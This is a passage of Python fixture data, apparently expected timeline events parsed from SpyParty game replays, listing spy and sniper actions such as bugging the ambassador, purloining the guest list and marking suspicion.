"action test red: fingerprint ambassador",
(None,),
(2 * 60 + 40.6),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Fingerprint,
ActionTest.Red,
),
(
"spy",
"02:40.6",
"fingerprinting failed.",
(None,),
(2 * 60 + 40.6),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"02:36.1",
"action triggered: bug ambassador",
(None,),
(2 * 60 + 36.1),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:36.1",
"begin planting bug while standing.",
(Characters.Morgan,),
(2 * 60 + 36.1),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:34.5",
"bugged ambassador while standing.",
(Characters.Morgan,),
(2 * 60 + 34.5),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.MissionComplete,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:31.6",
"spy puts down briefcase.",
(None,),
(2 * 60 + 31.6),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:31.2",
"missions reset.",
(None,),
(2 * 60 + 31.2),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:28.1",
"action triggered: bug ambassador",
(None,),
(2 * 60 + 28.1),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:28.1",
"begin planting bug while walking.",
(Characters.Morgan,),
(2 * 60 + 28.1),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:27.0",
"failed planting bug while walking.",
(Characters.Morgan,),
(2 * 60 + 27.0),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:24.4",
"action triggered: bug ambassador",
(None,),
(2 * 60 + 24.4),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:24.4",
"begin planting bug while walking.",
(Characters.Morgan,),
(2 * 60 + 24.4),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
],
),
(
"8346478285034783689",
[
(
"spy",
"02:31.0",
"action test white: inspect statues",
(None,),
(2 * 60 + 31.0),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Inspect,
ActionTest.White,
),
(
"spy",
"02:27.8",
"held statue inspected.",
(None,),
(2 * 60 + 27.8),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionPartial,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"02:27.8",
"all statues inspected.",
(None,),
(2 * 60 + 27.8),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionComplete,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"02:27.5",
"put back statue.",
(None,),
(2 * 60 + 27.5),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:23.1",
"marked suspicious.",
(Characters.Boots,),
(2 * 60 + 23.1),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:22.6",
"spy enters conversation.",
(None,),
(2 * 60 + 22.6),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:22.5",
"marked spy suspicious.",
(Characters.Alice,),
(2 * 60 + 22.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:22.1",
"marked neutral suspicion.",
(Characters.Boots,),
(2 * 60 + 22.1),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:17.6",
"action triggered: seduce target",
(None,),
(2 * 60 + 17.6),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:17.6",
"begin flirtation with seduction target.",
(Characters.Oprah,),
(2 * 60 + 17.6),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:16.6",
"action test green: seduce target",
(None,),
(2 * 60 + 16.6),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Green,
),
(
"spy",
"02:16.6",
"flirt with seduction target: 51%",
(Characters.Oprah,),
(2 * 60 + 16.6),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:15.0",
"stopped talking.",
(None,),
(2 * 60 + 15.0),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:51.7",
"request drink from waiter.",
(Characters.Alice,),
(1 * 60 + 51.7),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:47.0",
"waiter offered drink.",
(Characters.Alice,),
(1 * 60 + 47.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:43.3",
"action triggered: purloin guest list",
(None,),
(1 * 60 + 43.3),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"01:42.3",
"action test white: purloin guest list",
(None,),
(1 * 60 + 42.3),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Purloin,
ActionTest.White,
),
(
"spy",
"01:40.6",
"got drink from waiter.",
(Characters.Alice,),
(1 * 60 + 40.6),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:40.6",
"guest list purloined.",
(Characters.Alice,),
(1 * 60 + 40.6),
None,
(Roles.Spy,),
(None,),
TimelineCategory.MissionComplete,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"01:40.6",
"waiter stopped offering drink.",
(Characters.Alice,),
(1 * 60 + 40.6),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:35.9",
"marked neutral suspicion.",
(Characters.Carlos,),
(1 * 60 + 35.9),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:35.5",
"marked suspicious.",
(Characters.Helen,),
(1 * 60 + 35.5),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:34.8",
"sipped drink.",
(Characters.Alice,),
(1 * 60 + 34.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:34.7",
"marked less suspicious.",
(Characters.Salmon,),
(1 * 60 + 34.7),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:33.8",
"marked suspicious.",
(Characters.General,),
(1 * 60 + 33.8),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:32.5",
"marked less suspicious.",
(Characters.Irish,),
(1 * 60 + 32.5),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:32.2",
"marked less suspicious.",
(Characters.Boots,),
(1 * 60 + 32.2),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:31.9",
"marked less suspicious.",
(Characters.Disney,),
(1 * 60 + 31.9),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:31.6",
"flirtation cooldown expired.",
(None,),
(1 * 60 + 31.6),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"sniper",
"01:31.3",
"marked less suspicious.",
(Characters.Queen,),
(1 * 60 + 31.3),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"-3070462071415144270",
[
(
"spy",
"02:07.8",
"waiter stopped offering drink.",
(Characters.Taft,),
(2 * 60 + 07.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:04.5",
"missions reset.",
(None,),
(2 * 60 + 04.5),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.8",
"gulped drink.",
(Characters.Taft,),
(2 * 60 + 00.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:58.7",
"request drink from waiter.",
(Characters.Taft,),
(1 * 60 + 58.7),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:56.6",
"waiter offered drink.",
(Characters.Taft,),
(1 * 60 + 56.6),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:53.0",
"waiter stopped offering drink.",
(Characters.Taft,),
(1 * 60 + 53.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:52.1",
"waiter gave up.",
(Characters.Taft,),
(1 * 60 + 52.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:49.8",
"request drink from waiter.",
(Characters.Taft,),
(1 * 60 + 49.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:48.1",
"waiter offered drink.",
(Characters.Taft,),
(1 * 60 + 48.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:45.2",
"got drink from waiter.",
(Characters.Taft,),
(1 * 60 + 45.2),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:45.2",
"waiter stopped offering drink.",
(Characters.Taft,),
(1 * 60 + 45.2),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:39.5",
"gulped drink.",
(Characters.Taft,),
(1 * 60 + 39.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:37.0",
"request drink from waiter.",
(Characters.Taft,),
(1 * 60 + 37.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:33.7",
"waiter offered drink.",
(Characters.Taft,),
(1 * 60 + 33.7),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:32.4",
"action triggered: purloin guest list",
(None,),
(1 * 60 + 32.4),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"01:31.1",
"action test white: purloin guest list",
(None,),
(1 * 60 + 31.1),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Purloin,
ActionTest.White,
),
(
"spy",
"01:29.8",
"purloin guest list aborted.",
(None,),
(1 * 60 + 29.8),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"01:29.8",
"waiter stopped offering drink.",
(Characters.Taft,),
(1 * 60 + 29.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:28.9",
"waiter gave up.",
(Characters.Taft,),
(1 * 60 + 28.9),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:24.4",
"picked up statue.",
(None,),
(1 * 60 + 24.4),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:20.9",
"action triggered: inspect statues",
(None,),
(1 * 60 + 20.9),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:20.0",
"action test green: inspect statues",
(None,),
(1 * 60 + 20.0),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Inspect,
ActionTest.Green,
),
(
"spy",
"01:17.4",
"held statue inspected.",
(None,),
(1 * 60 + 17.4),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionPartial,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:14.5",
"action triggered: swap statue",
(None,),
(1 * 60 + 14.5),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"01:13.3",
"action test white: swap statue",
(None,),
(1 * 60 + 13.3),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Swap,
ActionTest.White,
),
(
"spy",
"01:13.3",
"statue swapped.",
(None,),
(1 * 60 + 13.3),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionComplete,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"01:10.5",
"put back statue.",
(None,),
(1 * 60 + 10.5),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:08.6",
"missions reset.",
(None,),
(1 * 60 + 08.6),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:07.8",
"picked up statue.",
(None,),
(1 * 60 + 07.8),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:02.3",
"action triggered: swap statue",
(None,),
(1 * 60 + 02.3),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Swap,
ActionTest.NoAT,
),
],
),
(
"-5205483914183321949",
[
(
"spy",
"00:51.0",
"spy enters conversation.",
(None,),
(00 * 60 + 51.0),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:47.8",
"action triggered: bug ambassador",
(None,),
(00 * 60 + 47.8),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"00:47.8",
"begin planting bug while standing.",
(Characters.Morgan,),
(00 * 60 + 47.8),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"00:46.1",
"bugged ambassador while standing.",
(Characters.Morgan,),
(00 * 60 + 46.1),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.MissionComplete,
Missions.Bug,
ActionTest.NoAT,
),
(
"game",
"00:46.1",
"missions completed. 10 second countdown.",
(None,),
(00 * 60 + 46.1),
None,
(None,),
(None,),
TimelineCategory.MissionCountdown,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:44.5",
"ambassador's personal space violated.",
(Characters.Morgan, Characters.Taft),
(00 * 60 + 44.5),
None,
(Roles.Ambassador, Roles.Spy),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:43.7",
"missions reset.",
(None,),
(00 * 60 + 43.7),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:41.1",
"spy leaves conversation.",
(None,),
(00 * 60 + 41.1),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:39.3",
"spy enters conversation.",
(None,),
(00 * 60 + 39.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:39.3",
"spy joined conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 39.3),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:35.1",
"waiter offered drink.",
(Characters.Taft,),
(00 * 60 + 35.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:32.1",
"ambassador's personal space violated.",
(Characters.Morgan, Characters.Taft),
(00 * 60 + 32.1),
None,
(Roles.Ambassador, Roles.Spy),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:30.8",
"spy leaves conversation.",
(None,),
(00 * 60 + 30.8),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:30.8",
"spy left conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 30.8),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:30.8",
"rejected drink from waiter.",
(Characters.Taft,),
(00 * 60 + 30.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:30.8",
"waiter stopped offering drink.",
(Characters.Taft,),
(00 * 60 + 30.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:24.7",
"45 seconds added to match.",
(None,),
(00 * 60 + 24.7),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:09.5",
"45 seconds added to match.",
(None,),
(1 * 60 + 09.5),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:54.4",
"45 seconds added to match.",
(None,),
(1 * 60 + 54.4),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:39.2",
"45 seconds added to match.",
(None,),
(2 * 60 + 39.2),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:54.5",
"waiter offered drink.",
(Characters.Taft,),
(2 * 60 + 54.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:51.8",
"picked up statue.",
(None,),
(2 * 60 + 51.8),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:49.1",
"rejected drink from waiter.",
(Characters.Taft,),
(2 * 60 + 49.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:49.1",
"picked up fingerprintable statue (difficult).",
(None,),
(2 * 60 + 49.1),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"02:49.1",
"waiter stopped offering drink.",
(Characters.Taft,),
(2 * 60 + 49.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:47.6",
"action triggered: fingerprint ambassador",
(None,),
(2 * 60 + 47.6),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"02:47.6",
"started fingerprinting statue.",
(None,),
(2 * 60 + 47.6),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"02:46.6",
"action test green: fingerprint ambassador",
(None,),
(2 * 60 + 46.6),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Fingerprint,
ActionTest.Green,
),
(
"spy",
"02:45.6",
"fingerprinted statue.",
(None,),
(2 * 60 + 45.6),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionPartial,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"02:43.0",
"put back statue.",
(None,),
(2 * 60 + 43.0),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"-5381334556900546672",
[
(
"spy",
"01:01.3",
"action test green: swap statue",
(None,),
(1 * 60 + 01.3),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Swap,
ActionTest.Green,
),
(
"spy",
"01:01.3",
"statue swap pending.",
(None,),
(1 * 60 + 01.3),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"00:58.5",
"put back statue.",
(None,),
(00 * 60 + 58.5),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:51.8",
"spy enters conversation.",
(None,),
(00 * 60 + 51.8),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:51.1",
"request drink from waiter.",
(Characters.Taft,),
(00 * 60 + 51.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:49.5",
"waiter offered drink.",
(Characters.Taft,),
(00 * 60 + 49.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:48.2",
"action triggered: purloin guest list",
(None,),
(00 * 60 + 48.2),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"00:47.5",
"action test white: purloin guest list",
(None,),
(00 * 60 + 47.5),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Purloin,
ActionTest.White,
),
(
"spy",
"00:46.5",
"spy leaves conversation.",
(None,),
(00 * 60 + 46.5),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:46.5",
"purloin guest list aborted.",
(None,),
(00 * 60 + 46.5),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"00:46.5",
"waiter stopped offering drink.",
(Characters.Taft,),
(00 * 60 + 46.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:46.2",
"spy enters conversation.",
(None,),
(00 * 60 + 46.2),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:45.6",
"waiter gave up.",
(Characters.Taft,),
(00 * 60 + 45.6),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:45.0",
"request drink from waiter.",
(Characters.Taft,),
(00 * 60 + 45.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:44.7",
"waiter offered drink.",
(Characters.Taft,),
(00 * 60 + 44.7),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:44.3",
"character picked up pending statue.",
(Characters.Irish,),
(00 * 60 + 44.3),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Statues,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"00:43.5",
"action triggered: purloin guest list",
(None,),
(00 * 60 + 43.5),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"00:42.1",
"action test white: purloin guest list",
(None,),
(00 * 60 + 42.1),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Purloin,
ActionTest.White,
),
(
"spy",
"00:41.3",
"spy leaves conversation.",
(None,),
(00 * 60 + 41.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:41.3",
"purloin guest list aborted.",
(None,),
(00 * 60 + 41.3),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"00:41.3",
"waiter stopped offering drink.",
(Characters.Taft,),
(00 * 60 + 41.3),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:41.1",
"spy enters conversation.",
(None,),
(00 * 60 + 41.1),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:40.5",
"waiter gave up.",
(Characters.Taft,),
(00 * 60 + 40.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:40.1",
"request drink from waiter.",
(Characters.Taft,),
(00 * 60 + 40.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:40.0",
"waiter offered drink.",
(Characters.Taft,),
(00 * 60 + 40.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:40.0",
"statue swapped.",
(Characters.Irish,),
(00 * 60 + 40.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionComplete,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"00:38.8",
"action triggered: purloin guest list",
(None,),
(00 * 60 + 38.8),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"00:37.5",
"action test green: purloin guest list",
(None,),
(00 * 60 + 37.5),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Purloin,
ActionTest.Green,
),
(
"spy",
"00:37.5",
"guest list purloin pending.",
(Characters.Taft,),
(00 * 60 + 37.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.NoCategory,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"00:37.5",
"rejected drink from waiter.",
(Characters.Taft,),
(00 * 60 + 37.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"-6996172267372142000",
[
(
"spy",
"02:16.6",
"flirt with seduction target: 51%",
(Characters.Oprah,),
(2 * 60 + 16.6),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:15.0",
"stopped talking.",
(None,),
(2 * 60 + 15.0),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:51.7",
"request drink from waiter.",
(Characters.Alice,),
(1 * 60 + 51.7),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:47.0",
"waiter offered drink.",
(Characters.Alice,),
(1 * 60 + 47.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:43.3",
"action triggered: purloin guest list",
(None,),
(1 * 60 + 43.3),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"01:42.3",
"action test white: purloin guest list",
(None,),
(1 * 60 + 42.3),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Purloin,
ActionTest.White,
),
(
"spy",
"01:40.6",
"got drink from waiter.",
(Characters.Alice,),
(1 * 60 + 40.6),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:40.6",
"guest list purloined.",
(Characters.Alice,),
(1 * 60 + 40.6),
None,
(Roles.Spy,),
(None,),
TimelineCategory.MissionComplete,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"01:40.6",
"waiter stopped offering drink.",
(Characters.Alice,),
(1 * 60 + 40.6),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:35.9",
"marked neutral suspicion.",
(Characters.Carlos,),
(1 * 60 + 35.9),
None,
